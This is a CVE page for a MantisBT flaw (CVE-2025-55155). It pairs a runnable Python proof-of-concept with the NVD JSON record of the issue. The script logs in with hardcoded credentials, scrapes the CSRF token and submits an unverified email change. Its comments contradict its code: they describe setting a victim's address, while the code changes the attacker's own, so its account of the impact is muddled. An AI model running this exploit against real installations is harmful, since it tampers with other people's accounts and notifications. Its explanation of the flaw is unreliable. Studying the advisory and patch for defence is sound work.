CVE-2025-55155

# CVE-2025-55155 PoC - MantisBT Email Validation Bypass # This PoC demonstrates the email address modification without verification import requests import json TARGET_URL = "http://target-mantisbt.com" ATTACKER_EMAIL = "[email protected]" def exploit_email_hijack(): """ Exploit the email validation bypass vulnerability in MantisBT <= 2.27.1 Steps: 1. Authenticate with low-privilege account 2. Capture valid session cookie 3. Modify email address to target's email (no verification required) 4. System notifications will now be sent to target's email """ session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{TARGET_URL}/login.php" login_data = { "username": "low_priv_user", "password": "password123", "return": "index.php" } response = session.post(login_url, data=login_data) if "Logged On" not in response.text: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Access account preferences page account_url = f"{TARGET_URL}/account_pref_page.php" response = session.get(account_url) # Step 3: Extract form token import re token_match = re.search(r'name="__csrf_token" value="([^"]+)"', response.text) if not token_match: print("[-] Could not extract CSRF token") return False csrf_token = token_match.group(1) print(f"[+] CSRF Token: {csrf_token}") # Step 4: Submit email change without verification update_url = f"{TARGET_URL}/account_pref_update.php" update_data = { "__csrf_token": csrf_token, "email": ATTACKER_EMAIL, # No verification required! "save": "Save" } response = session.post(update_url, data=update_data) if response.status_code == 200: print(f"[+] Email changed to: {ATTACKER_EMAIL}") print("[+] System notifications will now be sent to attacker email") return True else: print("[-] Email change failed") return False if __name__ == "__main__": exploit_email_hijack()

{"cve": {"id": "CVE-2025-55155", "sourceIdentifier": "[email protected]", "published": "2025-11-04T21:15:39.280", "lastModified": "2025-11-10T18:02:32.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.27.1 and below, when a user edits their profile to change their e-mail address, the system saves it without validating that it actually belongs to the user. This could result in storing an invalid email address, preventing the user from receiving system notifications. Notifications sent to another person's email address could lead to information disclosure. This issue is fixed in version 2.27.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}, {"lang": "en", "value": "CWE-354"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.27.2", "matchCriteriaId": "B49EF21D-F412-4C89-BFA8-9606F204E310"}]}]}], "references": [{"url": "https://github.com/mantisbt/mantisbt/commit/21e9fbedde8553c29c0d3156e84f78157fc4f22e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-q747-c74m-69pr", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://mantisbt.org/bugs/view.php?id=36005", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}